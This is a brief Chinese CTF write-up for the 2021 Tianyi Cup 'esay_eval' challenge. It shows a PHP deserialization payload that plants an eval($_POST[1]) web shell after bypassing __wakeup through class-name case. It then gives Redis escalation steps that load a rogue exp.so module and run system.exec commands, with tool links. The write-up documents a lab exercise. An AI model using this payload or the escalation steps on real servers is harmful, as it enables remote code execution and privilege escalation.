[天翼杯 2021]esay_eval--REDIS
2022/6/12 6:20:13
本文主要是介绍[天翼杯 2021]esay_eval--REDIS,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
代码pop链子构造不难,问题是反序列化要绕过wakeup,正常就是改数字,但是这里有个正则过滤 注意匹配的是大写字母,而类的名称大小写即可,于是可以绕过
反序列化传入一个一句话代码,蚁剑连接
?poc=O:1:%22b%22:2:{s:1:%22a%22;O:1:%22a%22:1:{s:4:%22code%22;s:16:%22eval($_POST[1]);%22;}}
发现有文件
下载打开
发现Redis密码,猜测是Redis提权
用蚁剑连接Redis
蚁剑Redis插件地址: https://github.com/Medicean/AS_Redis
先在有权限的目录上传一个exp.so文件
文件地址:https://github.com/Dliv3/redis-rogue-server
在Redis命令行执行
MODULE LOAD /var/www/html/exp.so
system.exec "命令"
提权成功
这篇关于[天翼杯 2021]esay_eval--REDIS的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-07Redis高并发入门详解
- 2024-12-07Redis缓存入门:新手必读指南
- 2024-12-07Redis缓存入门:新手必读教程
- 2024-12-07Redis入门:新手必备的简单教程
- 2024-12-07Redis入门:新手必读的简单教程
- 2024-12-06Redis入门教程:从安装到基本操作
- 2024-12-06Redis缓存入门教程:轻松掌握缓存技巧
- 2024-12-04Redis入门:简单教程详解
- 2024-11-29Redis开发入门教程:从零开始学习Redis
- 2024-11-27Redis入门指南:快速掌握Redis基础操作